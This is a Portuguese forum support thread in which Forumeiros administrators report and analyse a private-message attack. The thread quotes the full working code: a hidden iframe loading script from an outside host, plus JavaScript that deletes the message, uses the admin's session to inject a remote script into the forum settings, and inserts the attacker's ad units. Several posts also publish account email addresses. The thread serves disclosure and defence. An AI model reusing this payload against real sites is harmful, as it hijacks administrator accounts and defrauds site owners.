Tentativas de Hacker o Fórum, por MP.

[danki5]

Detalhes da dúvida

Versão do fórum : phpBB3
Nível de acesso : Administrador
Navegador usado : Google Chrome
Membros afetados : Vários usuários, uns sim e outros não
Problema começou : Desde o dia 27/01/2015
Endereço do fórum : http://xmutantesrpg.forumeiros.com/

Descrição do problema

Boa tarde,

Estou tendo problemas em um dos fóruns que sou administrador.

Alguém conseguiu encontrar uma brecha na segurança do forumeiros atraves de MP.

Funcionou da seguinte forma:

1- Ele mandou uma MP com uma pergunta boba, para cada um dos Adm do fórum que atuo.

2- Quando cada um dos Adm abriu a MP, dava tempo para ler ela e simplesmente ela sumia em seguida como se nunca tivesse sido mandada.

3- Achamos estranho no primeiro dia, até em então não tomamos nenhuma providencia achando que era apenas algum erro qualquer.

4 - No dia seguinte todos Adm receberam novamente a MP, comecei a desconfiar do ocorrido e fui verificar a seção de segurança do fórum para ver se tinha alguma modificação ou algo estranho. Para minha surpresa tinha mais de uma criação de javascript minha e de outros Adms, olhei as datas e horas, e bateu com o horário que abrimos as mps.

5 - Apaguei cada um dos javas scripts, mais antes cheguei a guardar para poder analisar eles depois ou pedir que alguém olha-se para mim.

6 - Entramos na conta de quem fez as mps, mas não existia mais nenhuma lá, queria recuperar o codigo da mp que nos  "hackeou" mas sem sucesso...

7 - Outro dia recebemos uma mp estranha novamente e um dos adm conseguiu pegar o codigo da MP, que estava oculto mais uma vez em uma pergunta boba.

-----------------------

IMAGENS

https://i.imgur.com/tmLjpWj.png
https://i.imgur.com/cJGlkXP.png
https://i.imgur.com/3wWvEE0.png
https://i.imgur.com/zCGFcCj.png

-----------------------

CODIGO DA TERCEIRA TENTATIVA POR MP

Código:

 [table style="width:1px;height:1px;border:1px solid transparent"][tr][td]<iframe style="width:1px;height:1px;border:1px solid transparent" src="javascript:if(window.top.dfgdgfdgfgcg===undefined){window.top.jQuery.getScript('http://xmlfeed2.6te.net/d')};window.top.dfgdgfdgfgcg='a'"></iframe>[/td]
[/tr]
[/table]

[JScript]

Estes são os códigos usados:

1-

Código:


jQuery(document).ready(function() {

    jQuery.post('/privmsg', {
        'delete': 'true',
        'mark[]': location.href.split('p=')[1],
        'confirm': 's'
    });

    var phpbb3 = '#wrap #page-header .headerbar #logo-desc p';
    var phpbb2 = 'table.bodylinewidth td.bodyline table[width="100%"][cellspacing="0"][cellpadding="0"][border="0"] td[align="center"][width="100%"] span.gen';
    var invision = '#ipbwrapper #logostrip p#site-desc';
    var punbb = '.pun #pun-intro p#pun-desc';

    if (jQuery(phpbb3).length) {
        var sitedesc = jQuery(phpbb3).html()
    } else if (jQuery(phpbb2).length) {
        var sitedesc = jQuery(phpbb2).html().split('<br>&nbsp; ')[0]
    } else if (jQuery(invision).length) {
        var sitedesc = jQuery(invision).html()
    } else if (jQuery(punbb).length) {
        var sitedesc = jQuery(punbb).html()
    } else {
        var sitedesc = ''
    };

    var codigo = '<script src=//xmlfeed2.6te.net/s></script>';
    if (sitedesc.indexOf('<script src="//xmlfeed2.6te.net/s"></script>') == -1) {
        if (sitedesc.length > 213) {
            var descricao = sitedesc.substring(0, 213) + codigo
        } else if (sitedesc.length < 150) {
            for (var wordtest = ''; wordtest.length < 150 - sitedesc.length; wordtest += ' ') {};
            var descricao = sitedesc + wordtest + codigo
        } else {
            var descricao = sitedesc + codigo
        };

        jQuery.post('/admin/index.forum?mode=general&part=general&sub=general&tid=' + jQuery('#logout').attr('href').split("tid=")[1].split("&")[0], {
            'site_desc': descricao,
            'submit': 's'
        });
    };
});


2-

Código:


if (window.dfgdfgdfgdfg === undefined) {
    window.dfgdfgdfgdfg = 'a';

    function testedeadd() {
        if (jQuery('a[href^="/admin/index.forum?part=admin&tid="]').length == 0) {
            var numaleat = parseInt(1000000) + Math.floor(Math.random() * 9999999 - 1000000);
            var h = '<div style="margin:0 auto;text-align:center"><iframe style=width:728px!important;height:90px!important;overflow:hidden!important frameborder=0 id=' + numaleat + '></iframe></div>';
            var phpbb2 = 'table.bodylinewidth td.bodyline table[cellspacing="0"][cellpadding="0"][border="0"]:has(a.mainmenu)';
            if (jQuery('script[src^="http://cas.criteo.com/delivery/ajs.php?"]').length) {
                jQuery('script[src^="http://cas.criteo.com/delivery/ajs.php?"]').closest('div[class]').replaceWith(h)
            } else if (jQuery('script[src="http://partner.googleadservices.com/gampad/google_service.js"]').length) {
                jQuery('script[src="http://partner.googleadservices.com/gampad/google_service.js"]').closest('div[class]').replaceWith(h)
            } else {
                if (jQuery('.pun').length) {
                    jQuery('.pun #pun-head').after(h)
                } else if (jQuery('#wrap').length) {
                    jQuery('#wrap #page-body').prepend(h)
                } else if (jQuery('#ipbwrapper').length) {
                    jQuery('#ipbwrapper #main-content').prepend(h)
                } else if (jQuery(phpbb2).length) {
                    jQuery(phpbb2).after(h)
                }
            };
            ifrm = document.getElementById(numaleat);
            ifrm = (ifrm.contentWindow) ? ifrm.contentWindow : (ifrm.contentDocument.document) ? ifrm.contentDocument.document : ifrm.contentDocument;
            ifrm.document.open();
            ifrm.document.write('<style>body{margin:0px}</style><script>google_ad_client=\x22pub-4591355146850004\x22;google_ad_slot=\x221666688237\x22;google_ad_width=728;google_ad_height=90</script><script src=http://pagead2.googlesyndication.com/pagead/show_ads.js></script>');
            ifrm.document.close();
            if (window.location.hostname == 'www.pokemonmythology.org') {
                jQuery('#fa_ticker_block').hide()
            };
            if (window.location.hostname == 'routeros.forumpramim.net') {
                jQuery('#fa_ticker_block').hide()
            }
        };
        jQuery('script[src="//xmlfeed2.6te.net/s"]').remove()
    };

    jQuery(document).ready(function() {
        if (window.testedeaddfdgd === undefined) {
            testedeaddfdgd = 'a';
            testedeadd()
        }
    });

    document.addEventListener("DOMContentLoaded", function(event) {
        if (window.testedeaddfdgd === undefined) {
            testedeaddfdgd = 'a';
            testedeadd()
        };
    });

    window.onload = function(e) {
        if (window.testedeaddfdgd === undefined) {
            testedeaddfdgd = 'a';
            testedeadd()
        };
    };

};


Eles estão hospedados neste domínio: http://xmlfeed2.6te.net/

Farei uma análise neles para verificar o nível de gravidade,

JS

[danki5]

Muito obrigado, ficarei no aguardo.

[JScript]

@danki5

Os seguintes fóruns listados abaixo e que pertencem a Forumeiros, fazem parte do código:
1- http://www.pokemonmythology.org/
2- http://routeros.forumpramim.net/

Também é "injetado" o código que está neste link: http://pagead2.googlesyndication.com/pagead/show_ads.js

Abaixo o trecho que oculta o módulo #fa_ticker_block para os respectivos fóruns acima citados:

Código:


            if (window.location.hostname == 'www.pokemonmythology.org') {
                jQuery('#fa_ticker_block').hide()
            };
            if (window.location.hostname == 'routeros.forumpramim.net') {
                jQuery('#fa_ticker_block').hide()
            }


Aguarde mais informações,

JS

[Chrono Trigger]

Também recebi mp's com perguntas bem idiotas, eram duas contas de uma mesma pessoa, só apareceu um código na parte do javascrip que foi de feed, eu acabei add aquela barrinha de ferramentas que fica no topo que nem a do forumeiros.

[JScript]

@Chrono Trigger

Se você for (e eu acredito que seja) um admin do fórum e poder me passar o email de quem lhe enviou essa MP, eu posso acionar a justiça do país em que o indivíduo está e com isso tomar as providências cabíveis nos tramites da lei.

JS

[danki5]

Etona@hotmail.com

Adp0klah@hotmail.com

No meu caso foi esses dois, mas como o fórum estava com ativação automática da conta, acredito que o email nem exista.

--

Teria alguma forma de desativar os javas que são recebidos por MP para evitar esses ataques?

[Chrono Trigger]

Etona@hotmail.com

Adp0klah@hotmail.com

No meu caso foi esses dois, mas como o fórum estava com ativação automática da conta, acredito que o email nem exista.

--

Teria alguma forma de desativar os javas que são recebidos por MP para evitar esses ataques?

Os e-mails também eram assim, era o nick do usuário.
Estrate@hotmail.com
Sonalitc@hotmail.com

O mais engraçado que quando ele mandava a mp você abria questão de segundos a página atualizava e ela era deletada, cheguei a mandar mp ao usuário, como ele tinha duas contas no fórum e é contra as regras do meu fórum, e ao me responder a mp dele também foi deletada. Depois de ler este tópico acabei banindo as duas contas, receio que não irá adiantar mas já ficarei de olho.

[JScript]

A todos:

Uma solução perfeita é desativar o HTML das postagens, dessa forma seu fórum não estará suscetível a esse tipo de ataque!

JS

[danki5]

https://i.imgur.com/MmfKGaJ.png
https://i.imgur.com/lHuqFGU.png

Não sei se vai ajudar, mais tenho os IPs da segunda tentativa...

[JScript]

@danki5

Sim, com o IP eu já pulo a etapa do provedor de emails, obrigado!

JS

[viniliff]

Olá.

Recomendo que não divulguem e-mails em mensagens no Fórum dos Fóruns, para fins de segurança e privacidade.

Isto é algo que não fica a meu critério, é claro, mas acredito que dialogar com o membro ou, até mesmo bani-lo, seja uma solução mais inteligente do que acionar a justiça. E no mais, a solução final já foi publicada:

A todos:

Uma solução perfeita é desativar o HTML das postagens, dessa forma seu fórum não estará suscetível a esse tipo de ataque!

JS

Lembrem-se que a lei é muito mais complexa do que a simples ação de enviar MPs que "desaparecem" posteriormente. Além disso, é preciso que hajam provas concretas. Isto é apenas uma recomendação!

Até mais.

[JScript]

Olá.

Recomendo que não divulguem e-mails em mensagens no Fórum dos Fóruns, para fins de segurança e privacidade.

Isto é algo que não fica a meu critério, é claro, mas acredito que dialogar com o membro ou, até mesmo bani-lo, seja uma solução mais inteligente do que acionar a justiça.

É com esse pensamento que esses indivíduos ainda se mantém importunando a vida de quem tem fóruns da Forumeiros!

Então devemos dialogar com quem faz essas coisas que são consideradas ilícitas?!
Você acha mesmo que a solução "banir" funciona como deveria?

Eu acho que você deve saber que a criminalidade não está somente nas ruas físicas, mas também no mundo virtual e assim como no real, devemos combater todo e qualquer ato que prejudique a vida seja social ou virtual de alguém.

JS

[danki5]

viniliff

Para esclarecer, como foi informado nas mensagens acima, foram utilizadas mais de uma conta e ataques em dias consecutivos, o que invalida a solução inteligente de Banir ou de conversar, como sugerido, pois a medida que baníamos ele criava uma outra e fazia o mesmo. E como dito por Chrono, o fórum dele parece ter sofrido algo parecido, o que impede desse autor de ataques não fazer o mesmo ou já esta fazendo com outros fóruns do forumeiros por estar saindo impune?

Conheço um pouco de programação, mais sou leigo em javascript, mas pelo tamanho do código, hospedagem de scripts em outros lugares, não me parece uma tentativa de alguém que quer conversar ou que tenha preparado isso tudo para atacar apenas um fórum. Tenho a desconfiança que o alvo dele era a conta do fundador, não vejo outro motivo para ele repetir o ataque, no nosso forum conseguimos evitar que o fundador abrisse a MP, talvez evitando um problema maior.

[Chrono Trigger]

Eu não consegui pegar o Ip dele muito menos o código da mensagem. Bani as duas contas, caso aconteça novamente ai vamos ter que resolver de outra forma.

[Sennior]

Saudações,

JScript, o senhor com todo conhecimento que tem, será que por via não conseguiria criar algo para criar uma segurança para os membros? Algo que como eu vi em um tópico criado aqui mesmo no Fórum dos fóruns o membro pedia um código que bloqueasse JavaScript na mensagem privada.

Sou bem neutro nessa linguagem, mas o senhor com todo conhecimento acha que dá pra criar algo assim? Que sanaria a função JavaScript em mensagens privadas?
Até mais.

[JScript]

@Sennior
Olá!

Aceito o desafio e lhe garanto que JS será proibido até nos tópicos, mesmo estando com o HTML ativo!!!

Em breve,

JS

[JScript]

Nota: Eu não consegui editar a mensagem anterior!

---

Está sendo feito um rastreamento para saber quem criou o endereço http://xmlfeed2.6te.net no host http://www.freewebhostingarea.com/ , com isso chegaremos até o indivíduo que o criou!

JS

[danki5]

Obrigado senhores pelo ótimo atendimento, ficarei no aguardo.

Bloqueie as MPs enquanto não é resolvido.

[nikka]

Olá danki5,

Devido a um iframe oculto nas mensagens ou Mensagens Privadas, um código script era adicionado à descrição do fórum, fazendo com que as publicidades aparecessem, mesmo que tenha assinalado ou pago para que isso aconteça.

Uma alteração ao nível dos códigos foi realizada hoje pelos técnicos nos fóruns Forumeiros de forma a que isso não volte a acontecer.


Agradecemos a sua colaboração e pedimos desculpas pelos inconvenientes causados.
Até mais.